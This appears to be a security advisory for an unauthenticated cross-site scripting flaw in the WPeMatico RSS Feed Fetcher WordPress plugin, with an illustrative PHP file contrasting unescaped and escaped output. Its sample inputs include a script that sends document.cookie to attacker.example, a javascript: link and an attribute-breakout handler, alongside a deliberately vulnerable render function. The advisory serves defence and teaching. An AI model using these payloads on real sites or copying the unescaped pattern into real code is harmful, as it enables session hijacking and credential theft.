Impact
The vulnerability is a cross-site scripting (XSS) flaw in the WPeMatico RSS Feed Fetcher plugin for WordPress, either reflected via a crafted request or stored via fetched feed content. It lets an attacker inject script that runs in the browser of any user who views the affected page, inside that user's WordPress session. Because the flaw is exploitable without authentication, the attacker needs no account on the target site. The impact is bounded by the role of whoever views the injected output: for an ordinary visitor it is limited, but for a logged-in administrator the script runs with the site's most privileged session, enabling credential theft, session hijacking, or administrative actions performed on the attacker's behalf.
Affected Systems
Vendor: etruel (WordPress plugin developer). Product: WPeMatico RSS Feed Fetcher. Affected versions: all releases up to and including 2.8.17. Any WordPress site running the plugin at one of these versions is exposed; the remediation is to upgrade to a release later than 2.8.17.
Risk and Exploitability
The CVSS base score of 7.1 rates this issue High. No EPSS score is published, so there is no empirical estimate of exploitation probability, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. Neither absence reduces the exposure: on an unpatched version an attacker can craft a malicious URL or a poisoned feed entry that triggers the XSS without any credentials. The payload executes when a user views plugin output: for the reflected case, a user who follows the crafted link; for the stored case, anyone who opens a page that renders the fetched feed. On a publicly accessible site the attack is straightforward and low-effort, and the practical risk is highest where administrators routinely view pages or admin screens that display feed content.
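The following PHP is an added illustration for this advisory, not WPeMatico's code: it shows the generic output-escaping mistake behind this class of unauthenticated XSS in a WordPress plugin that prints feed data and request parameters, the escaped form beside it, and a check for whether an installed copy is at or below the affected 2.8.17. The function names, the sample feed item and filter parameter, and the plugin basename wpematico/wpematico.php are assumptions; the esc_*() shims approximate WordPress's own functions only so the file also runs under plain php outside WordPress.

```php
<?php
// Added illustration, not the plugin's code. Shims approximate WordPress
// esc_html()/esc_attr()/esc_url() so this runs outside WordPress; inside
// WordPress the real functions are used because function_exists() is true.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $s ) { return htmlspecialchars( (string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' ); }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $s ) { return htmlspecialchars( (string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' ); }
}
if ( ! function_exists( 'esc_url' ) ) {
    // Simplified shim: allow only http(s) URLs, otherwise return an empty string.
    function esc_url( $u ) {
        $u = trim( (string) $u );
        return preg_match( '#^https?://#i', $u ) ? htmlspecialchars( $u, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' ) : '';
    }
}

// Constructed sample inputs (assumptions): a feed item whose title carries a
// script payload and a javascript: link, plus a query parameter that breaks
// out of an attribute. In practice these come from the remote RSS source or
// from the request URL, neither of which the site controls.
$sample_item = array(
    'title' => 'Weekly news <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'link'  => 'javascript:alert(document.domain)',
);
$sample_filter = '" onmouseover="alert(1)';

// VULNERABLE pattern: raw interpolation into HTML. Whoever views the page
// runs the script; a logged-in administrator runs it with the admin session.
function render_item_unsafe( array $item, $filter ) {
    return '<li class="feed-item" data-filter="' . $filter . '">'
         . '<a href="' . $item['link'] . '">' . $item['title'] . '</a></li>';
}

// HARDENED pattern: escape at output time with the function for the context:
// esc_attr() inside attributes, esc_url() for href/src, esc_html() in text.
function render_item_safe( array $item, $filter ) {
    return '<li class="feed-item" data-filter="' . esc_attr( $filter ) . '">'
         . '<a href="' . esc_url( $item['link'] ) . '">' . esc_html( $item['title'] ) . '</a></li>';
}

// Practitioner check: read the plugin header and compare against 2.8.17.
// The basename wpematico/wpematico.php is an assumption; adjust if it differs.
function wpematico_is_affected( $plugin_dir ) {
    $file = rtrim( $plugin_dir, '/' ) . '/wpematico/wpematico.php';
    if ( ! is_readable( $file ) ) {
        return false; // not installed at this path
    }
    $header = file_get_contents( $file, false, null, 0, 8192 );
    if ( ! preg_match( '/^[ \t\/*#@]*Version:\s*(\S+)/mi', $header, $m ) ) {
        return false; // no Version: header found
    }
    return version_compare( $m[1], '2.8.17', '<=' );
}

echo render_item_unsafe( $sample_item, $sample_filter ), PHP_EOL;
echo render_item_safe( $sample_item, $sample_filter ), PHP_EOL;
// Example call from a WordPress install (constant defined by WordPress):
// var_dump( wpematico_is_affected( WP_PLUGIN_DIR ) );
```

The unsafe line prints the script tag and the onmouseover handler verbatim; the safe line prints them as inert text, and the javascript: link becomes an empty href. If the plugin legitimately needs to keep markup from feed bodies, wp_kses_post() is the WordPress function for that case: it strips script tags, on* handlers and javascript: URLs while keeping post-safe HTML, whereas blanket esc_html() would flatten the markup.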
OpenCVE Enrichment